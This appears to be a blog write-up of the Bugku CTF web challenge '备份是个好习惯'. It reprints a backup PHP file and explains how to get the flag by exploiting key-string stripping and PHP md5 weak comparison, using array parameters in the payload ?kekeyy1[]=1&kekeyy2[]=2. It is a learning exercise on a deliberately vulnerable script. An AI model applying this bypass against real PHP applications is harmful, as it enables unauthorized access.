ctf bugku-备份是个好习惯

目录扫描,找到index.php.bak
内容如下,备注自己加的

<?php
#引入flag.php
include_once "flag.php";
#设置不报错
ini_set("display_errors", 0);
#将地址栏?后面的字符截取后传入$str
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
#这个说明得用kkeyey或者kekeyy
$str = str_replace('key','',$str);
#查询字符串解析到变量,用于页面传参
parse_str($str);
#$key1[]=1 $key2[]=2 
echo md5($key1);
echo md5($key2);

#属于MD5弱类型碰撞,使用数组绕过即可
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
#payload得出flag
#?kekeyy1[]=1&kekeyy2[]=2(即null==null)
?>

学习资料

CTF_Web:php弱类型绕过与md5碰撞

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值